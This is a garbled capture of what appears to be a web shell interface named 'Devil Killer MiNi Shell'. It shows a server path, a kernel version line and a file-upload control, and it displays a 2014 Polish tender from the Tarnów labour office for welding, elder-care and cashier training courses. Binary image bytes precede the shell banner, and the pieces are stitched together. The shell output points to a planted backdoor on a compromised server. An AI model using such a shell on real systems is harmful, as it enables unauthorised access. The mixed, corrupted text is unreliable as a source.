JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140415/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140415/128588-N-2014.html

<p class="kh_header"><b>Tarnów: Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla osób bezrobotnych 
zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie
CZĘŚĆ I zamówienia - Spawanie blach i rur spoinami pachwinowymi metodą TIG (141)
                                           dla 10 osób,
CZĘŚĆ II zamówienia - Opiekun osób starszych i chorych z elementami rehabilitacji oraz 
                                           nauką języka niemieckiego dla 10 osób,
CZĘŚĆ III zamówienia - Fakturzysta z obsługą kasy fiskalnej dla 10 osób.</b><br>
<b>Numer ogłoszenia: 128588 - 2014; data zamieszczenia: 15.04.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Tarnowie , pl. J. Bema 3, 33-100 Tarnów, woj. małopolskie, tel. 014 6882300, faks 014 6882301.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.up.tarnow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia jest organizacja i przeprowadzenie szkoleń dla osób bezrobotnych 
zarejestrowanych w Powiatowym Urzędzie Pracy w Tarnowie
CZĘŚĆ I zamówienia - Spawanie blach i rur spoinami pachwinowymi metodą TIG (141)
                                           dla 10 osób,
CZĘŚĆ II zamówienia - Opiekun osób starszych i chorych z elementami rehabilitacji oraz 
                                           nauką języka niemieckiego dla 10 osób,
CZĘŚĆ III zamówienia - Fakturzysta z obsługą kasy fiskalnej dla 10 osób..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> CZĘŚĆ I zamówienia
1. Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Spawanie blach 
i rur spoinami pachwinowymi metodą TIG (141) dla 10 osób,
2) szkolenie realizowane jest w ramach projektu Czas na pracę współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
3) szkolenie musi zostać przeprowadzone zgodnie z wytycznymi Instytutu Spawalnictwa 
w Gliwicach,
4) przy jednym stanowisku praktycznej nauki zawodu mogą pracować maksymalnie 2 osoby,
5) absolwent szkolenia otrzymuje: 
- zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, tematy i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie; zaświadczenie musi być oznaczone logo projektu (zawierające: logotyp PO KL, logotyp Unii Europejskiej, hasło promocyjne zarezerwowane dla Programu Kapitał Ludzki Człowiek najlepsza inwestycja, informacje o projekcie, w ramach którego prowadzone będzie szkolenie, a także informacje dotyczące współfinansowania projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego; oznaczenie musi być zgodne  z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL oraz Planem Komunikacji PO KL; wytyczne jak i Plan Komunikacji dostępne są na stronie internetowej www.pokl.wup-krakow.pl),
- książkę spawacza,
- świadectwo egzaminu kwalifikacyjnego spawacza,
6) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
7) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
8) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
9) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
10) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-8, 
OPIS - Usługi szkolenia zawodowego. 
CZĘŚĆ II zamówienia
1. Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Opiekun osób starszych i chorych z elementami rehabilitacji oraz nauką języka niemieckiego dla 10 osób,
2) szkolenie realizowane jest w ramach projektu Czas na pracę współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
3) szkolenie winno obejmować minimum 300 godzin zegarowych zajęć, w tym:
- minimum 200 godzin zegarowych zajęć z zakresu opieki nad osobą starszą i chorą z elementami rehabilitacji, z czego minimum 140 godzin to zajęcia praktyczne,
- minimum 100 godzin zegarowych zajęć z zakresu nauki języka niemieckiego,
4) program szkolenia winien obejmować w szczególności zagadnienia z zakresu:
- pedagogiki specjalnej,
- gerontologii,
- zasad etyczno - moralnych,
- udzielania pierwszej pomocy w sytuacji zagrożenia życia lub określonej niedyspozycji,
- podstawowych czynności pielęgnacyjno - higienicznych,
- utrzymania czystości w otoczeniu podopiecznego,
- technik wykonywania podstawowych zabiegów rehabilitacyjnych,
- stosowania wybranych form terapii zajęciowej i organizowania zajęć rekreacyjnych podopiecznych,
- nauki języka niemieckiego (od podstaw) z uwzględnieniem słownictwa zgodnego z zakresem szkolenia,
5) uczestnicy winni otrzymać na własność książkę oraz ćwiczenia do nauki języka niemieckiego (od podstaw),
6) zajęcia winny być realizowane w systemie: 2 godziny zajęć z języka niemieckiego i 4 godziny zajęć w ramach opieki nad osobą starszą i chorą (Zamawiający dopuszcza możliwość zmiany realizowanych zajęć tylko w uzasadnionych przypadkach),
7) absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub inny dokument potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, tematy 
i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie; zaświadczenie musi być oznaczone logo projektu (zawierające: logotyp PO KL, logotyp Unii Europejskiej, hasło promocyjne zarezerwowane dla Programu Kapitał Ludzki Człowiek najlepsza inwestycja, informacje o projekcie, w ramach którego prowadzone będzie szkolenie, a także informacje dotyczące współfinansowania projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego; oznaczenie musi być zgodne  
z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL oraz Planem Komunikacji PO KL; wytyczne jak i Plan Komunikacji dostępne są na stronie internetowej www.pokl.wup-krakow.pl),
8) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
9) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
10) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
11) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
12) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-8, 
OPIS - Usługi szkolenia zawodowego. 
CZĘŚĆ III zamówienia
1. Przedmiot zamówienia
1)  przedmiotem zamówienia jest organizacja i przeprowadzenie szkolenia pn. Fakturzysta 
z obsługą kasy fiskalnej dla 10 osób,
2) szkolenie realizowane jest w ramach projektu Czas na pracę współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego,
3) szkolenie winno obejmować minimum 80 godzin zegarowych zajęć, w tym minimum 65 godzin zajęć praktycznych
4) program szkolenia winien obejmować w szczególności:
- podstawowe wiadomości dotyczące sprzedaży,
- podstawy obsługi komputera,
- obsługę programu do fakturowania,
- wystawianie faktur i paragonów,
- podstawy towaroznawstwa,
- dokumentację handlową i magazynową,
- obsługę kasy fiskalnej,
- obsługę terminala kart płatniczych,
5) liczba uczestników szkolenia przypadająca na jedno stanowisko praktycznej nauki zawodu wynosi 1 osoba (tj. każda osoba uczestnicząca w szkoleniu musi posiadać do dyspozycji 1 kasę fiskalną oraz 1 stanowisko komputerowe z odpowiednim oprogramowaniem niezbędnym 
do przeprowadzenia szkolenia),
6) absolwent szkolenia winien otrzymać zaświadczenie o ukończeniu szkolenia zawierające: numer z rejestru, imię i nazwisko oraz numer PESEL uczestnika szkolenia, a w przypadku cudzoziemca numer dokumentu stwierdzającego tożsamość, nazwę instytucji szkoleniowej przeprowadzającej szkolenie, formę i nazwę szkolenia, okres trwania szkolenia, miejsce i datę wydania zaświadczenia lub inny dokumentu potwierdzający ukończenie szkolenia i uzyskanie kwalifikacji, tematy 
i wymiar godzin zajęć edukacyjnych, podpis osoby upoważnionej przez instytucje szkoleniową przeprowadzającą szkolenie; zaświadczenie musi być oznaczone logo projektu (zawierające: logotyp PO KL, logotyp Unii Europejskiej, hasło promocyjne zarezerwowane dla Programu Kapitał Ludzki Człowiek najlepsza inwestycja, informacje o projekcie, w ramach którego prowadzone będzie szkolenie, a także informacje dotyczące współfinansowania projektu ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego; oznaczenie musi być zgodne  
z wytycznymi dotyczącymi oznaczania projektów w ramach PO KL oraz Planem Komunikacji PO KL; wytyczne jak i Plan Komunikacji dostępne są na stronie internetowej www.pokl.wup-krakow.pl),
7) Zamawiający nie dopuszcza prowadzenia zajęć w formule kształcenia na odległość,
8) zajęcia muszą być realizowane w dni robocze od poniedziałku do piątku (tj. przez 5 dni 
  w tygodniu), w przedziale czasowym między godziną 700 a 1900,
9) szkolenie musi trwać średnio nie mniej niż 25 godzin zegarowych w tygodniu, 
10) zajęcia nie mogą odbywać się dłużej niż 8 godzin zegarowych dziennie,
11) Wykonawca zobowiązany jest do zapewnienia cateringu w każdym dniu szkolenia w postaci:   gorących i zimnych napojów (kawa, herbata, sok, woda mineralna) oraz drożdżówek/kanapek.

Opis przedmiotu zamówienia zgodnie ze Wspólnym Słownikiem Zamówień:
Kod CPV - 80530000-8, 
OPIS - Usługi szkolenia zawodowego..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA - w celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2014 rok,
- w celu wykazania posiadania uprawnień Wykonawca musi posiadać aktualny atest Instytutu Spawalnictwa w Gliwicach lub jednorazową zgodę na przeprowadzenie kursu dla spawaczy (objęty przedmiotem zamówienia) wydany/wydaną przez Instytut Spawalnictwa w Gliwicach,
CZĘŚĆ II ZAMÓWIENIA - w celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2014 rok,
CZĘŚĆ III ZAMÓWIENIA - w celu wykazania posiadania uprawnień Wykonawca musi być wpisany do rejestru instytucji szkoleniowych prowadzonego przez wojewódzki urząd pracy właściwy ze względu na siedzibę wykonawcy; wpis musi być uaktualniony na 2014 rok.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA - Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 10 osób z zakresu Spawanie blach i rur spoinami pachwinowymi metodą TIG (141),
CZĘŚĆ II ZAMÓWIENIA - Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 10 osób z zakresu - opiekun osób starszych i chorych 
z elementami rehabilitacji.
CZĘŚĆ III ZAMÓWIENIA - Wykonawca musi posiadać doświadczenie polegające na przeszkoleniu w ostatnich trzech latach przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, minimum 10 osób z zakresu - Fakturzysta z obsługą kasy fiskalnej.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA - w celu wykazania dysponowaniem odpowiednim potencjałem technicznym Wykonawca musi posiadać: salę wykładową o powierzchni minimum 20 m2, z uwzględnieniem bezpiecznych 
i higienicznych warunków realizacji szkolenia oraz minimum 5 stanowisk spawalniczych 
do przeprowadzenia szkolenia 
CZĘŚĆ II ZAMÓWIENIA - w celu wykazania dysponowaniem odpowiednim potencjałem technicznym Wykonawca musi posiadać: salę wykładową o powierzchni minimum 20 m2, z uwzględnieniem bezpiecznych 
i higienicznych warunków realizacji szkolenia oraz łóżko i fantom do przeprowadzenia zajęć praktycznych,
CZĘŚĆ III ZAMÓWIENIA - w celu wykazania dysponowaniem odpowiednim potencjałem technicznym Wykonawca musi posiadać: salę wykładową o powierzchni minimum 20 m2, z uwzględnieniem bezpiecznych 
i higienicznych warunków realizacji szkolenia oraz minimum 10 kas fiskalnych i 10 stanowisk komputerowych z oprogramowaniem niezbędnym do przeprowadzenia szkolenia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I ZAMÓWIENIA - w celu wykazania dysponowaniem osobami zdolnymi do wykonania zamówienia Wykonawca musi zapewnić:
przeprowadzenie zajęć teoretycznych przez minimum 2 osoby, osoby te muszą posiadać: wykształcenie wyższe zgodne z zakresem prowadzonych zajęć (dopuszcza się możliwość prowadzenia zajęć przez osoby posiadające ukończone studia podyplomowe zgodne z zakresem prowadzonych zajęć), co najmniej 5-letni staż pracy zgodny z zakresem prowadzonych zajęć, przygotowanie pedagogiczne,
przeprowadzenie zajęć praktycznych przez minimum 2 osoby, osoby te muszą posiadać: wykształcenie minimum średnie, co najmniej 5-letni staż pracy zgodny z zakresem prowadzonych zajęć, przygotowanie pedagogiczne,
CZĘŚĆ II ZAMÓWIENIA - w celu wykazania dysponowaniem osobami zdolnymi do wykonania zamówienia Wykonawca musi zapewnić:
przeprowadzenie zajęć teoretycznych przez minimum 2 osoby, osoby te muszą posiadać: wykształcenie wyższe zgodne z zakresem prowadzonych zajęć (dopuszcza się możliwość prowadzenia zajęć przez osoby posiadające ukończone studia podyplomowe zgodne z zakresem prowadzonych zajęć), co najmniej 5-letni staż pracy zgodny z zakresem prowadzonych zajęć, przygotowanie pedagogiczne,
przeprowadzenie zajęć praktycznych przez minimum 2 osoby, osoby te muszą posiadać: wykształcenie minimum średnie zgodne z zakresem prowadzonych zajęć, co najmniej 5-letni staż pracy zgodny z zakresem prowadzonych zajęć, przygotowanie pedagogiczne,
CZĘŚĆ III ZAMÓWIENIA - w celu wykazania dysponowaniem osobami zdolnymi do wykonania zamówienia Wykonawca musi zapewnić:
przeprowadzenie zajęć teoretycznych przez minimum 2 osoby, osoby te muszą posiadać: wykształcenie wyższe zgodne z zakresem prowadzonych zajęć (dopuszcza się możliwość prowadzenia zajęć przez osoby posiadające ukończone studia podyplomowe zgodne z zakresem prowadzonych zajęć), co najmniej 5-letni staż pracy zgodny z zakresem prowadzonych zajęć, przygotowanie pedagogiczne,
przeprowadzenie zajęć praktycznych przez minimum 2 osoby, osoby te muszą posiadać: wykształcenie minimum średnie zgodne z zakresem prowadzonych zajęć, co najmniej 5-letni staż pracy zgodny z zakresem prowadzonych zajęć, przygotowanie pedagogiczne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>CZĘŚĆ I, II i III ZAMÓWIENIA     - Zamawiający nie stawia szczególnych wymagań w zakresie spełniania tego warunku.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>CZĘŚĆ I ZAMÓWIENIA 1) Kalkulacja kosztów szkolenia (załącznik nr 4).
2) Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3) Oświadczenie dotyczące powierzenia wykonania części zamówienia podwykonawcy 
    (załącznik nr 6).
4) Formularz ofertowy (załącznik nr 1).
5) Program szkolenia pn. Spawanie blach i rur spoinami pachwinowymi metodą TIG (141), zgodny z opisem przedmiotu zamówienia (załącznik nr 3).
6) Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13).
7) Zaakceptowany wzór ankiety zakończenia udziału w projekcie (załącznik nr 16).
CZĘŚĆ II ZAMÓWIENIA 1) Kalkulacja kosztów szkolenia (załącznik nr 4).
2) Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3) Oświadczenie dotyczące powierzenia wykonania części zamówienia podwykonawcy 
    (załącznik nr 6).
4) Formularz ofertowy (załącznik nr 1).
5) Program szkolenia pn. Opiekun osób starszych i chorych z elementami rehabilitacji oraz nauką języka niemieckiego, zgodny z opisem przedmiotu zamówienia (załącznik nr 3).
6) Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13).
7) Zaakceptowany wzór ankiety zakończenia udziału w projekcie (załącznik nr 16).
CZĘŚĆ III ZAMÓWIENIA 
1) Kalkulacja kosztów szkolenia (załącznik nr 4).
2) Zaakceptowany projekt umowy o przeprowadzenie szkolenia (załącznik nr 5).
3) Oświadczenie dotyczące powierzenia wykonania części zamówienia podwykonawcy 
    (załącznik nr 6).
4) Formularz ofertowy (załącznik nr 1).
5) Program szkolenia pn. Fakturzysta z obsługą kasy fiskalnej, zgodny 
    z opisem przedmiotu zamówienia (załącznik nr 3).
6) Zaakceptowany wzór ankiety dla uczestników szkolenia (załącznik nr 13).
7) Zaakceptowany wzór ankiety zakończenia udziału w projekcie (załącznik nr 16).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
